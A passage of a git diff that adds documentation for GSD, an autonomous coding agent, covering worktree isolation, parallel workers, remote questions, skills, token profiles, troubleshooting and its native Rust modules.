`worktree` mode + +Each milestone gets its own git worktree on a `milestone/` branch. All execution happens inside the worktree. On completion, the worktree is squash-merged to main as one clean commit. The worktree and branch are cleaned up. + +### `branch` mode + +Work happens in the project root on a `milestone/` branch. No worktree is created. On completion, the branch is merged to main. + + +**Changed in v2.45.0:** The default isolation mode changed from `worktree` to `none`. If your workflow relies on worktree isolation, set `git.isolation: worktree` explicitly in your preferences. + + +## Branching model + +``` +main ───────────────────────────────────────────────────────── + │ ↑ + └── milestone/M001 (worktree) ────────────────────────┘ + commit: feat: core types + commit: feat: markdown parser + commit: feat: file writer + → squash-merged to main as single commit +``` + +### Parallel worktrees + +With [parallel orchestration](/guides/parallel-orchestration) enabled, multiple milestones run in separate worktrees simultaneously: + +``` +main ────────────────────────────────────────────────────────── + │ ↑ ↑ + ├── milestone/M002 (worktree) ─────────┘ │ + │ → squash-merged first │ + │ │ + └── milestone/M003 (worktree) ────────────────────────┘ + → squash-merged second +``` + +Merges happen sequentially to avoid conflicts. + +### Commit format + +Conventional commit format with GSD metadata in trailers: + +``` +feat: core type definitions + +GSD-Task: M001/S01/T01 + +feat: markdown parser for plan files + +GSD-Task: M001/S01/T02 +``` + +## Workflow modes + +Set `mode` to get sensible defaults: + +```yaml +mode: solo # personal projects +mode: team # shared repos +``` + +| Setting | `solo` | `team` | +|---|---|---| +| `git.auto_push` | `true` | `false` | +| `git.push_branches` | `false` | `true` | +| `git.pre_merge_check` | `false` | `true` | +| `git.merge_strategy` | `"squash"` | `"squash"` | +| `unique_milestone_ids` | `false` | `true` | + +Mode defaults are the lowest priority — any explicit preference overrides them. + +## Git preferences + +```yaml +git: + auto_push: false + push_branches: false + remote: origin + snapshots: false + pre_merge_check: false + commit_type: feat + main_branch: main + merge_strategy: squash # "squash" or "merge" + isolation: none # "none" (default), "worktree", or "branch" + commit_docs: true + auto_pr: false + pr_target_branch: develop +``` + +### Automatic pull requests + +For teams using Gitflow or branch-based workflows: + +```yaml +git: + auto_push: true + auto_pr: true + pr_target_branch: develop +``` + +Pushes the milestone branch and creates a PR targeting your specified branch. Requires `gh` CLI installed and authenticated. + +### `commit_docs: false` + +Adds `.gsd/` to `.gitignore` and keeps all planning artifacts local-only. Useful for teams where only some members use GSD. + +## Worktree management + +### Automatic (auto mode) + +1. Milestone starts → worktree created at `.gsd/worktrees//` +2. Planning artifacts copied into the worktree +3. All execution happens inside the worktree +4. Milestone completes → squash-merged to main +5. Worktree and branch cleaned up + +### Manual + +``` +/worktree create +/worktree switch +/worktree merge +/worktree remove +``` + +## Self-healing + +GSD includes automatic recovery for common git issues: + +- **Detached HEAD** — automatically reattaches to the correct branch +- **Stale lock files** — removes `index.lock` files from crashed processes +- **Orphaned worktrees** — detects and offers cleanup + +Run `/gsd doctor` to check git health manually. diff --git a/mintlify-docs/guides/migration.mdx b/mintlify-docs/guides/migration.mdx new file mode 100644 index 000000000..8f4646d79 --- /dev/null +++ b/mintlify-docs/guides/migration.mdx @@ -0,0 +1,47 @@ +--- +title: "Migration from v1" +description: "Migrate .planning directories from the original GSD to GSD-2's .gsd format." +--- + +If you have projects with `.planning` directories from the original Get Shit Done (v1), you can migrate them to GSD-2's `.gsd` format. + +## Running the migration + +```bash +# From within the project directory +/gsd migrate + +# Or specify a path +/gsd migrate ~/projects/my-old-project +``` + +## What gets migrated + +The migration tool: + +- Parses `PROJECT.md`, `ROADMAP.md`, `REQUIREMENTS.md`, phase directories, plans, summaries, and research +- Maps phases → slices, plans → tasks, milestones → milestones +- Preserves completion state (`[x]` phases stay done, summaries carry over) +- Consolidates research files +- Shows a preview before writing anything +- Optionally runs an agent-driven review of the output + +## Supported formats + +The migration handles various v1 format variations: + +- Milestone-sectioned roadmaps with `
` blocks +- Bold phase entries +- Bullet-format requirements +- Decimal phase numbering +- Duplicate phase numbers across milestones + +## Post-migration + +Verify the output: + +``` +/gsd doctor +``` + +This checks `.gsd/` integrity and flags any structural issues. diff --git a/mintlify-docs/guides/parallel-orchestration.mdx b/mintlify-docs/guides/parallel-orchestration.mdx new file mode 100644 index 000000000..830f0d10e --- /dev/null +++ b/mintlify-docs/guides/parallel-orchestration.mdx @@ -0,0 +1,123 @@ +--- +title: "Parallel orchestration" +description: "Run multiple milestones simultaneously in isolated git worktrees." +--- + +Run multiple milestones simultaneously. Each gets its own worker process, branch, and context window — while a coordinator tracks progress, enforces budgets, and keeps everything in sync. + + +Parallel mode is behind `parallel.enabled: false` by default. Opt-in only. + + +## Quick start + +1. Enable in preferences: + +```yaml +parallel: + enabled: true + max_workers: 2 +``` + +2. Start parallel execution: + +``` +/gsd parallel start +``` + +3. Monitor progress: + +``` +/gsd parallel status +``` + +## Architecture + +``` +┌─────────────────────────────────────────────────────┐ +│ Coordinator (your GSD session) │ +│ │ +│ ┌──────────┐ ┌──────────┐ ┌──────────┐ │ +│ │ Worker 1 │ │ Worker 2 │ │ Worker 3 │ ... │ +│ │ M001 │ │ M003 │ │ M005 │ │ +│ └──────────┘ └──────────┘ └──────────┘ │ +│ │ │ │ │ +│ ▼ ▼ ▼ │ +│ .gsd/worktrees/ .gsd/worktrees/ .gsd/worktrees/ │ +└─────────────────────────────────────────────────────┘ +``` + +### Worker isolation + +| Resource | Isolation method | +|----------|-----------------| +| Filesystem | Git worktree — separate checkout | +| Git branch | `milestone/` per milestone | +| State | `GSD_MILESTONE_LOCK` — each worker sees only its milestone | +| Context | Separate process with its own agent sessions | +| Metrics | Each worktree has its own `metrics.json` | + +## Eligibility analysis + +Before starting, GSD checks which milestones can run concurrently: + +1. **Not complete** — finished milestones are skipped +2. **Dependencies satisfied** — all `dependsOn` entries must be complete +3. **File overlap check** — shared files get a warning (not a blocker) + +## Configuration + +```yaml +parallel: + enabled: false + max_workers: 2 + budget_ceiling: 50.00 + merge_strategy: "per-milestone" # or "per-slice" + auto_merge: "confirm" # "auto", "confirm", or "manual" +``` + +| Key | Default | Description | +|-----|---------|-------------| +| `enabled` | `false` | Master toggle | +| `max_workers` | `2` | Concurrent workers (1-4) | +| `budget_ceiling` | none | Aggregate cost limit across all workers | +| `merge_strategy` | `"per-milestone"` | When to merge back to main | +| `auto_merge` | `"confirm"` | How merge-back is handled | + +## Commands + +| Command | Description | +|---------|-------------| +| `/gsd parallel start` | Analyze, confirm, and start workers | +| `/gsd parallel status` | Show workers with state, progress, cost | +| `/gsd parallel stop [MID]` | Stop all or a specific worker | +| `/gsd parallel pause [MID]` | Pause all or a specific worker | +| `/gsd parallel resume [MID]` | Resume paused workers | +| `/gsd parallel merge [MID]` | Merge completed milestones to main | + +## Merge reconciliation + +- `.gsd/` state files — auto-resolved (accept milestone branch version) +- Code conflicts — merge halts, shows conflicting files. Resolve manually and retry. + +## Budget management + +When `budget_ceiling` is set, aggregate cost is tracked across all workers. Ceiling reached → coordinator signals workers to stop. + +## Troubleshooting + +### "No milestones are eligible" + +All milestones are complete or blocked by dependencies. Check `/gsd queue`. + +### Worker crashed + +Workers persist state to disk. On restart, the coordinator detects dead PIDs. Run `/gsd doctor --fix` to clean up, then `/gsd parallel start` to spawn new workers. + +### Merge conflicts + +``` +/gsd parallel merge # see which milestones conflict +# resolve in .gsd/worktrees// +/gsd parallel merge MID # retry +``` diff --git a/mintlify-docs/guides/remote-questions.mdx b/mintlify-docs/guides/remote-questions.mdx new file mode 100644 index 000000000..a21ac9ea8 --- /dev/null +++ b/mintlify-docs/guides/remote-questions.mdx @@ -0,0 +1,84 @@ +--- +title: "Remote questions" +description: "Discord, Slack, and Telegram integration for headless auto-mode." +--- + +Remote questions allow GSD to ask for user input via Slack, Discord, or Telegram when running in headless auto-mode. When GSD encounters a decision point, it posts the question to your configured channel and polls for a response. + +## Setup + + + + ``` + /gsd remote discord + ``` + + The setup wizard validates your bot token, picks a server and channel, sends a test message, and saves the config. + + **Bot requirements:** + - A Discord bot token from the [Developer Portal](https://discord.com/developers/applications) + - Permissions: Send Messages, Read Message History, Add Reactions, View Channel + + + ``` + /gsd remote slack + ``` + + The setup wizard validates your bot token, picks a channel, sends a test message, and saves the config. + + **Bot requirements:** + - A Slack bot token (`xoxb-...`) from [Slack API](https://api.slack.com/apps) + - Scopes: `chat:write`, `reactions:read`, `reactions:write`, `channels:read`, `groups:read`, `channels:history`, `groups:history` + + + ``` + /gsd remote telegram + ``` + + The setup wizard validates your bot token, prompts for a chat ID, sends a test message, and saves the config. + + **Bot requirements:** + - A bot token from [@BotFather](https://t.me/BotFather) + - Bot must be added to the target group chat + + + +## Configuration + +```yaml +remote_questions: + channel: discord + channel_id: "1234567890123456789" + timeout_minutes: 5 + poll_interval_seconds: 5 +``` + +## How it works + +1. GSD encounters a decision point during auto-mode +2. The question is posted to your channel as a rich embed (Discord) or Block Kit message (Slack) +3. GSD polls for a response at the configured interval +4. You respond by reacting with a number emoji or replying with text +5. GSD picks up the response and continues +6. A check reaction confirms receipt + +### Response formats + +**Single question:** React with a number emoji (1️⃣-5️⃣) or reply with a number. + +**Multiple questions:** Reply with semicolons (`1;2;custom text`) or one answer per line. + +### Timeouts + +If no response within `timeout_minutes`, the LLM makes a conservative default choice or pauses auto-mode. + +## Commands + +| Command | Description | +|---------|-------------| +| `/gsd remote` | Show menu and current status | +| `/gsd remote slack` | Set up Slack | +| `/gsd remote discord` | Set up Discord | +| `/gsd remote telegram` | Set up Telegram | +| `/gsd remote status` | Show current config and last prompt status | +| `/gsd remote disconnect` | Remove configuration | diff --git a/mintlify-docs/guides/skills.mdx b/mintlify-docs/guides/skills.mdx new file mode 100644 index 000000000..66a05b096 --- /dev/null +++ b/mintlify-docs/guides/skills.mdx @@ -0,0 +1,97 @@ +--- +title: "Skills" +description: "Specialized instruction sets that provide domain-specific guidance to the LLM." +--- + +Skills are specialized instruction sets that GSD loads when the task matches. They provide domain-specific guidance — coding patterns, framework idioms, testing strategies, and tool usage. + +## Bundled skills + +GSD ships with these skills, installed to `~/.gsd/agent/skills/`: + +| Skill | Trigger | Description | +|-------|---------|-------------| +| `frontend-design` | Web UI work | Production-grade frontend with high design quality | +| `swiftui` | macOS/iOS apps | Full lifecycle from creation to shipping | +| `debug-like-expert` | Complex debugging | Methodical investigation with evidence gathering | +| `rust-core` | Rust code | Idiomatic, safe, performant Rust patterns | +| `axum-web-framework` | Axum web apps | Complete Axum development guide | +| `tauri` | Tauri v2 desktop apps | Cross-platform desktop development | +| `github-workflows` | GitHub Actions | CI/CD, workflow debugging | +| `security-audit` | Security auditing | Dependency scanning, OWASP | +| `review` | Code review | Diff-aware quality analysis | +| `test` | Test generation | Auto-detects frameworks | +| `lint` | Linting and formatting | ESLint, Biome, Prettier | + +## Skill discovery + +The `skill_discovery` preference controls how GSD finds skills: + +| Mode | Behavior | +|------|----------| +| `auto` | Skills found and applied automatically | +| `suggest` | Skills identified but require confirmation (default) | +| `off` | No skill discovery | + +## Skill preferences + +```yaml +always_use_skills: + - debug-like-expert +prefer_skills: + - frontend-design +avoid_skills: + - security-docker +skill_rules: + - when: task involves Clerk authentication + use: [clerk] + - when: frontend styling work + prefer: [frontend-design] +``` + +### Resolution order + +1. **Bare name** — e.g., `frontend-design` → scans `~/.gsd/agent/skills/` and project skills +2. **Absolute path** — e.g., `/Users/you/.gsd/agent/skills/my-skill/SKILL.md` +3. **Directory path** — looks for `SKILL.md` inside + +User skills take precedence over project skills. + +## Custom skills + +Create a directory with a `SKILL.md` file: + +``` +~/.gsd/agent/skills/my-skill/ + SKILL.md — instructions for the LLM + references/ — optional reference files +``` + +### Project-local skills + +``` +.gsd/agent/skills/my-project-skill/ + SKILL.md +``` + +## Skill health dashboard + +``` +/gsd skill-health # overview table +/gsd skill-health rust-core # detailed view +/gsd skill-health --stale 30 # unused for 30+ days +/gsd skill-health --declining # falling success rates +``` + +The dashboard flags: +- Success rate below 70% over the last 10 uses +- Token usage rising 20%+ +- Skills unused beyond the staleness threshold + +### Staleness detection + +```yaml +skill_staleness_days: 60 # default: 60, set 0 to disable +``` + +Stale skills are excluded from automatic matching but remain invokable explicitly. diff --git a/mintlify-docs/guides/token-optimization.mdx b/mintlify-docs/guides/token-optimization.mdx new file mode 100644 index 000000000..ae79bf525 --- /dev/null +++ b/mintlify-docs/guides/token-optimization.mdx @@ -0,0 +1,175 @@ +--- +title: "Token optimization" +description: "Token profiles, context compression, and complexity-based task routing to reduce costs by 40-60%." +--- + +GSD's token optimization system has three pillars: **token profiles**, **context compression**, and **complexity-based task routing**. + +## Token profiles + +A token profile coordinates model selection, phase skipping, and context compression. Set it in preferences: + +```yaml +token_profile: balanced +``` + +### `budget` — maximum savings (40-60% reduction) + +| Dimension | Setting | +|-----------|---------| +| Planning model | Sonnet | +| Execution model | Sonnet | +| Simple task model | Haiku | +| Completion model | Haiku | +| Milestone research | Skipped | +| Slice research | Skipped | +| Reassessment | Skipped | +| Context level | Minimal | + +Best for: prototyping, small projects, well-understood codebases. + +### `balanced` — smart defaults + +| Dimension | Setting | +|-----------|---------| +| All models | User's default | +| Subagent model | Sonnet | +| Milestone research | Runs | +| Slice research | Skipped | +| Reassessment | Runs | +| Context level | Standard | + +Best for: most projects, day-to-day development. + +### `quality` — full context + +Every phase runs. Every context artifact is inlined. No shortcuts. Best for: complex architectures, greenfield projects, critical production work. + +## Context compression + +Each profile maps to an **inline level** controlling how much context is pre-loaded into dispatch prompts: + +| Profile | Level | What's included | +|---------|-------|-----------------| +| `budget` | Minimal | Task plan, essential prior summaries (truncated). Drops decisions, requirements, templates. | +| `balanced` | Standard | Task plan, prior summaries, slice plan, roadmap excerpt. | +| `quality` | Full | Everything — all plans, summaries, decisions, requirements, templates. | + +### Prompt compression + +GSD can apply deterministic text compression before falling back to section-boundary truncation: + +```yaml +compression_strategy: compress # or "truncate" +``` + +| Strategy | Behavior | Default for | +|----------|----------|------------| +| `truncate` | Drop entire sections at boundaries | `quality` | +| `compress` | Heuristic text compression first, then truncate | `budget`, `balanced` | + +### Context selection + +```yaml +context_selection: smart # or "full" +``` + +| Mode | Behavior | Default for | +|------|----------|------------| +| `full` | Inline entire files | `balanced`, `quality` | +| `smart` | TF-IDF semantic chunking for large files | `budget` | + +## Complexity-based task routing + +GSD classifies each task by complexity and routes it to an appropriate model tier. + + +Dynamic routing requires explicit `models` in your preferences. Without a `models` section, routing is skipped. + + +### Classification signals + +| Signal | Simple | Standard | Complex | +|--------|--------|----------|---------| +| Step count | ≤ 3 | 4-7 | ≥ 8 | +| File count | ≤ 3 | 4-7 | ≥ 8 | +| Description length | < 500 chars | 500-2000 | > 2000 chars | +| Code blocks | — | — | ≥ 5 | +| Complexity keywords | None | Any present | — | + +**Complexity keywords:** `research`, `investigate`, `refactor`, `migrate`, `integrate`, `complex`, `architect`, `redesign`, `security`, `performance`, `concurrent`, `parallel` + +### Budget pressure + +When approaching the budget ceiling, the classifier automatically downgrades tiers: + +| Budget used | Effect | +|------------|--------| +| < 50% | No adjustment | +| 50-75% | Standard → Light | +| 75-90% | More aggressive | +| > 90% | Everything except Heavy → Light | + +## Adaptive learning + +GSD tracks success/failure per tier and adjusts classifications over time. User feedback via `/gsd rate` is weighted 2x: + +``` +/gsd rate over # model was overpowered +/gsd rate ok # appropriate +/gsd rate under # too weak +``` + +## Configuration examples + + + + ```yaml + --- + version: 1 + token_profile: budget + budget_ceiling: 25.00 + models: + execution_simple: claude-haiku-4-5-20250414 + --- + ``` + + + ```yaml + --- + version: 1 + token_profile: balanced + models: + planning: + model: claude-opus-4-6 + fallbacks: + - openrouter/z-ai/glm-5 + execution: claude-sonnet-4-6 + --- + ``` + + + ```yaml + --- + version: 1 + token_profile: quality + models: + planning: claude-opus-4-6 + execution: claude-opus-4-6 + --- + ``` + + + +Per-phase overrides always win over profile defaults: + +```yaml +--- +version: 1 +token_profile: budget +phases: + skip_research: false # keep research despite budget profile +models: + planning: claude-opus-4-6 # use Opus for planning despite budget +--- +``` diff --git a/mintlify-docs/guides/troubleshooting.mdx b/mintlify-docs/guides/troubleshooting.mdx new file mode 100644 index 000000000..a95cd8557 --- /dev/null +++ b/mintlify-docs/guides/troubleshooting.mdx @@ -0,0 +1,158 @@ +--- +title: "Troubleshooting" +description: "Common issues, /gsd doctor, /gsd forensics, and recovery procedures." +--- + +## `/gsd doctor` + +The built-in diagnostic tool validates `.gsd/` integrity: + +``` +/gsd doctor +``` + +It checks file structure, referential integrity, completion state consistency, git worktree health, and stale lock files. + +## Common issues + + + + **Cause:** Stale cache after a crash, or the LLM didn't produce the expected artifact. + + **Fix:** Run `/gsd doctor` to repair state, then `/gsd auto`. + + + + **Cause:** A unit failed to produce its expected artifact twice in a row. + + **Fix:** Check the task plan for clarity. Refine it manually, then `/gsd auto`. + + + + **Cause:** npm's global bin directory isn't in `$PATH`. + + **Fix:** + ```bash + npm prefix -g + echo 'export PATH="$(npm prefix -g)/bin:$PATH"' >> ~/.zshrc + source ~/.zshrc + ``` + + **Workaround:** `npx gsd-pi` or `$(npm prefix -g)/bin/gsd` + + + + | Error type | Auto-resume? | Delay | + |-----------|-------------|-------| + | Rate limit (429) | Yes | retry-after or 60s | + | Server error (500, 502, 503) | Yes | 30s | + | Auth/billing | No | Manual resume | + + For transient errors, configure fallback models: + ```yaml + models: + execution: + model: claude-sonnet-4-6 + fallbacks: + - openrouter/minimax/minimax-m2.5 + ``` + + + + Increase `budget_ceiling` in preferences, or switch to `budget` token profile. Resume with `/gsd auto`. + + + + GSD auto-detects stale locks. If automatic recovery fails: + ```bash + rm -f .gsd/auto.lock + rm -rf "$(dirname .gsd)/.gsd.lock" + ``` + + + + GSD auto-resolves conflicts on `.gsd/` runtime files. For code conflicts, the LLM attempts resolution. If that fails, resolve manually. + + + + **Cause:** Antivirus, indexers, or editors briefly locking files during atomic rename. + + **Fix:** Re-run the operation. Close tools holding files open if the error persists. Run `/gsd doctor` to verify repo health. + + + + **Cause:** The default `git.isolation` mode changed from `worktree` to `none` in v2.45.0. + + **Fix:** Set `git.isolation: worktree` explicitly in your preferences: + ```yaml + git: + isolation: worktree + ``` + + + + **Cause:** GSD v2.45+ checks for Node.js >= 22 and git availability at startup. + + **Fix:** Install Node.js 22+ (24 LTS recommended) and ensure `git` is in your PATH. + + + +## `/gsd forensics` + +Full-access debugger for post-mortem analysis: + +``` +/gsd forensics [optional problem description] +``` + +Provides anomaly detection, unit traces, metrics analysis, doctor integration, and LLM-guided investigation. + +## MCP client issues + +Use `/gsd mcp` to check MCP server status and connectivity at a glance. + + + + Verify `.mcp.json` or `.gsd/mcp.json` exists and parses as valid JSON. + + + + Run the configured command outside GSD to confirm the server starts. Check backend URLs and dependencies. + + + + Use absolute paths. Set required environment variables in the MCP config's `env` block. + + + +## Recovery procedures + +### Reset auto mode state + +```bash +rm .gsd/auto.lock +rm .gsd/completed-units.json +``` + +Then `/gsd auto` to restart from current disk state. + +### Reset routing history + +```bash +rm .gsd/routing-history.json +``` + +### Full state rebuild + +``` +/gsd doctor +``` + +Rebuilds `STATE.md` from plan and roadmap files on disk. + +## Getting help + +- **GitHub Issues:** [github.com/gsd-build/GSD-2/issues](https://github.com/gsd-build/gsd-2/issues) +- **Dashboard:** `Ctrl+Alt+G` or `/gsd status` +- **Forensics:** `/gsd forensics` +- **Session logs:** `.gsd/activity/` diff --git a/mintlify-docs/guides/visualizer.mdx b/mintlify-docs/guides/visualizer.mdx new file mode 100644 index 000000000..5ea199621 --- /dev/null +++ b/mintlify-docs/guides/visualizer.mdx @@ -0,0 +1,82 @@ +--- +title: "Workflow visualizer" +description: "Interactive TUI overlay for progress, dependencies, metrics, and timeline." +--- + +The workflow visualizer is a full-screen TUI overlay with four tabs showing project progress, dependencies, cost metrics, and execution timeline. + +## Opening + +``` +/gsd visualize +``` + +Or configure automatic display after milestone completion: + +```yaml +auto_visualize: true +``` + +## Tabs + +Switch tabs with `Tab`, `1`-`4`, or arrow keys. + +### 1. Progress + +A tree view of milestones, slices, and tasks with completion status: + +``` +M001: User Management 3/6 tasks ⏳ + ✅ S01: Auth module 3/3 tasks + ✅ T01: Core types + ✅ T02: JWT middleware + ✅ T03: Login flow + ⏳ S02: User dashboard 1/2 tasks + ✅ T01: Layout component + ⬜ T02: Profile page +``` + +### 2. Dependencies + +ASCII dependency graph showing slice relationships: + +``` +S01 ──→ S02 ──→ S04 + └───→ S03 ──↗ +``` + +### 3. Metrics + +Bar charts showing cost and token usage by phase, slice, and model. + +### 4. Timeline + +Chronological execution history with unit type, timestamps, duration, model, and token counts. + +## Controls + +| Key | Action | +|-----|--------| +| `Tab` | Next tab | +| `Shift+Tab` | Previous tab | +| `1`-`4` | Jump to tab | +| `↑`/`↓` | Scroll | +| `Escape` / `q` | Close | + +The visualizer refreshes from disk every 2 seconds, staying current alongside a running auto-mode session. + +## HTML export + +For shareable reports outside the terminal: + +``` +/gsd export --html +``` + +Generates a self-contained HTML file in `.gsd/reports/` with progress tree, dependency graph (SVG), cost/token charts, execution timeline, and changelog. All CSS and JS are inlined — printable to PDF from any browser. + +```yaml +auto_report: true # auto-generate after milestone completion (default) +``` + +An auto-generated `index.html` shows all reports with progression metrics across milestones. diff --git a/mintlify-docs/guides/web-interface.mdx b/mintlify-docs/guides/web-interface.mdx new file mode 100644 index 000000000..75f769c86 --- /dev/null +++ b/mintlify-docs/guides/web-interface.mdx @@ -0,0 +1,38 @@ +--- +title: "Web interface" +description: "Browser-based project management with real-time progress and multi-project support." +--- + +GSD includes a browser-based web interface for project management, real-time progress monitoring, and multi-project support. + +## Quick start + +```bash +gsd --web +``` + +### CLI flags + +```bash +gsd --web --host 0.0.0.0 --port 8080 --allowed-origins "https://example.com" +``` + +| Flag | Default | Description | +|------|---------|-------------| +| `--host` | `localhost` | Bind address | +| `--port` | `3000` | Port | +| `--allowed-origins` | (none) | Comma-separated CORS origins | + +## Features + +- **Project management** — view milestones, slices, and tasks in a visual dashboard +- **Real-time progress** — server-sent events push status updates during auto-mode +- **Multi-project support** — manage multiple projects from a single tab via `?project=` URL parameter +- **Change project root** — switch directories from the web UI without restarting +- **Onboarding flow** — API key setup and provider configuration through the browser +- **Model selection** — switch models and providers from the web UI + +## Platform notes + +- **macOS/Linux** — full support +- **Windows** — web build is skipped due to Next.js webpack issues. The CLI remains fully functional. diff --git a/mintlify-docs/guides/working-in-teams.mdx b/mintlify-docs/guides/working-in-teams.mdx new file mode 100644 index 000000000..72baa19e2 --- /dev/null +++ b/mintlify-docs/guides/working-in-teams.mdx @@ -0,0 +1,72 @@ +--- +title: "Working in teams" +description: "Multi-user workflows with unique milestone IDs, push branches, and shared planning artifacts." +--- + +GSD supports multi-user workflows where several developers work on the same repository concurrently. + +## Setup + +### 1. Set team mode + +```yaml +# .gsd/PREFERENCES.md (project-level, committed to git) +--- +version: 1 +mode: team +--- +``` + +This enables unique milestone IDs, push branches, and pre-merge checks in one setting. Override individual settings on top of `mode: team` as needed. + +### 2. Configure `.gitignore` + +Share planning artifacts while keeping runtime files local: + +```bash +# Runtime / ephemeral (per-developer) +.gsd/auto.lock +.gsd/completed-units.json +.gsd/STATE.md +.gsd/metrics.json +.gsd/activity/ +.gsd/runtime/ +.gsd/worktrees/ +.gsd/milestones/**/continue.md +.gsd/milestones/**/*-CONTINUE.md +``` + +**Shared** (committed): preferences, PROJECT.md, REQUIREMENTS.md, DECISIONS.md, milestones. + +**Local** (gitignored): lock files, metrics, state cache, worktrees, activity logs. + +### 3. Commit + +```bash +git add .gsd/PREFERENCES.md +git commit -m "chore: enable GSD team workflow" +``` + +## `commit_docs: false` + +For teams where only some members use GSD: + +```yaml +git: + commit_docs: false +``` + +Adds `.gsd/` to `.gitignore` entirely. The developer gets structured planning without affecting teammates. + +## Parallel development + +Multiple developers run auto mode simultaneously on different milestones. Each developer gets their own worktree and unique `milestone/` branch. Milestone dependencies can be declared: + +```yaml +# M00X-CONTEXT.md frontmatter +--- +depends_on: [M001-eh88as] +--- +``` + +GSD enforces that dependent milestones complete before starting downstream work. diff --git a/mintlify-docs/images/favicon.svg b/mintlify-docs/images/favicon.svg new file mode 100644 index 000000000..90071ea65 --- /dev/null +++ b/mintlify-docs/images/favicon.svg @@ -0,0 +1,68 @@ + + + + + + + + + + + + + + + + + + + + Terminal + + + + + ~ + $ + npx get-shit-done-cc + + + ██████╗ ███████╗██████╗ + ██╔════╝ ██╔════╝██╔══██╗ + ██║ ███╗███████╗██║ ██║ + ██║ ██║╚════██║██║ ██║ + ╚██████╔╝███████║██████╔╝ + ╚═════╝ ╚══════╝╚═════╝ + + + Get Shit Done v1.0.1 + A meta-prompting, context engineering and spec-driven + development system for Claude Code by TÂCHES. + + + Installed commands/gsd + Installed get-shit-done + + + Done! Run /gsd:help to get started. + + + ~ + $ + + + diff --git a/mintlify-docs/images/logo.png b/mintlify-docs/images/logo.png new file mode 100644 index 000000000..b4584cc6a Binary files /dev/null and b/mintlify-docs/images/logo.png differ diff --git a/mintlify-docs/images/logo.svg b/mintlify-docs/images/logo.svg new file mode 100644 index 000000000..d9f61c16e --- /dev/null +++ b/mintlify-docs/images/logo.svg @@ -0,0 +1,17 @@ + + + + + + + + + + + + + + + diff --git a/mintlify-docs/introduction.mdx b/mintlify-docs/introduction.mdx new file mode 100644 index 000000000..ea30b2d5d --- /dev/null +++ b/mintlify-docs/introduction.mdx @@ -0,0 +1,101 @@ +--- +title: "GSD — Get Shit Done" +description: "An autonomous coding agent that researches, plans, executes, and commits code while you focus on what matters." +--- + +GSD is an autonomous coding agent. Describe what you want built, run `/gsd auto`, and walk away. Come back to working software with clean git history. + +## What GSD does + + + + A state machine reads your project state, dispatches work to an LLM in fresh context windows, and advances through research, planning, execution, and verification — all without manual intervention. + + + Every task produces a conventional commit. Milestones are squash-merged to main. Your `git log` reads like a changelog. + + + Budget ceilings, token profiles, and dynamic model routing keep costs in check. Use Haiku for simple tasks and Opus for architectural work — automatically. + + + Sessions recover from crashes, provider errors auto-retry, and headless mode auto-restarts with exponential backoff. Designed for overnight unattended execution. + + + +## How it works + +GSD organizes work into a hierarchy: + +``` +Milestone → a shippable version (4-10 slices) + Slice → one demoable vertical capability (1-7 tasks) + Task → one context-window-sized unit of work +``` + +The iron rule: **a task must fit in one context window.** If it can't, it's two tasks. + +Auto mode loops through this hierarchy: + +``` +Plan → Execute (per task) → Complete → Reassess Roadmap → Next Slice + ↓ (all slices done) + Validate → Complete Milestone +``` + +Every phase gets a fresh context window with pre-loaded context — no accumulated garbage, no degraded quality. + +## Two ways to work + + + + Type `/gsd` inside a session. GSD executes one unit at a time, pausing between each so you can review. + + ```bash + gsd + /gsd + ``` + + + Type `/gsd auto` and walk away. GSD autonomously researches, plans, executes, verifies, and commits until the milestone is complete. + + ```bash + gsd + /gsd auto + ``` + + + +The recommended workflow: auto mode in one terminal, steering from another. + +**Terminal 1 — let it build:** + +```bash +gsd +/gsd auto +``` + +**Terminal 2 — steer while it works:** + +```bash +gsd +/gsd discuss # talk through architecture decisions +/gsd status # check progress +/gsd capture # fire-and-forget thoughts +``` + +## Next steps + + + + Get up and running in under a minute. + + + How the autonomous execution engine works. + + + Every command, shortcut, and CLI flag. + + + Models, budgets, timeouts, and preferences. + + diff --git a/native/README.md b/native/README.md index bf818e9d5..4f6829681 100644 --- a/native/README.md +++ b/native/README.md @@ -6,8 +6,11 @@ Rust N-API addon providing high-performance native modules for GSD. ``` JS (packages/native) -> N-API -> Rust crates - ├── engine/ (N-API bindings, cdylib) - └── grep/ (ripgrep internals, pure Rust lib) + +native/crates/ +├── engine/ (N-API bindings, cdylib — 20+ modules) +├── grep/ (ripgrep internals, pure Rust lib) +└── ast/ (ast-grep structural search) ``` Inspired by [Oh My Pi's pi-natives](https://github.com/can1357/oh-my-pi), adapted for GSD's Node.js runtime. @@ -15,7 +18,7 @@ Inspired by [Oh My Pi's pi-natives](https://github.com/can1357/oh-my-pi), adapte ## Prerequisites - **Rust** (stable, 1.70+): https://rustup.rs -- **Node.js** (20.6+) +- **Node.js** (22.0.0+) ## Build @@ -41,6 +44,34 @@ npm run test:native ## Modules +### ast + +Structural code search via ast-grep. Provides pattern-based code matching that understands language syntax, enabling searches like "find all functions that return a Promise" rather than raw regex. + +### clipboard + +Native clipboard access for reading and writing system clipboard contents. + +### diff + +Fuzzy text matching and unified diff generation. Provides efficient comparison of text content with configurable matching thresholds. + +### fd + +Fuzzy file path discovery. Locates files by partial name matching across the project tree. + +### fs_cache + +Filesystem caching layer. Caches file metadata and contents to reduce redundant I/O during repeated operations. + +### git + +Libgit2-backed git read operations. Provides fast, direct access to repository status, diffs, blame, and log without shelling out to the `git` CLI. + +### glob / glob_util + +Gitignore-aware file discovery. Walks directory trees while respecting `.gitignore` rules, returning matching paths for a given glob pattern. + ### grep Ripgrep-backed regex search using the `grep-regex`, `grep-searcher`, and `grep-matcher` crates. @@ -72,6 +103,54 @@ const contentResult = searchContent(Buffer.from(fileContent), { }); ``` +### gsd_parser + +GSD file parsing and frontmatter extraction. Reads `.gsd` files and extracts structured metadata from YAML frontmatter blocks. + +### highlight + +Syntect-based syntax highlighting. Tokenizes source code and produces highlighted output for terminal or HTML rendering. + +### html + +HTML-to-Markdown conversion. Transforms HTML content into clean Markdown, useful for importing web content into GSD notes and documents. + +### image + +Image decoding, encoding, and resizing. Supports common formats (PNG, JPEG, WebP) and provides efficient thumbnail generation. + +### json_parse + +JSON parsing utilities. Provides streaming and fault-tolerant JSON parsing for large or partially valid payloads. + +### ps + +Cross-platform process tree management. Lists, inspects, and terminates process trees by PID, used for managing spawned subprocesses. + +### stream_process + +Streaming process I/O. Spawns child processes with non-blocking, streamed access to stdout and stderr for real-time output handling. + +### task + +Task-related native operations. Provides low-level primitives for task scheduling and execution within the native layer. + +### text + +ANSI-aware text measurement and wrapping. Correctly measures visible width of strings containing ANSI escape codes and wraps text to terminal column 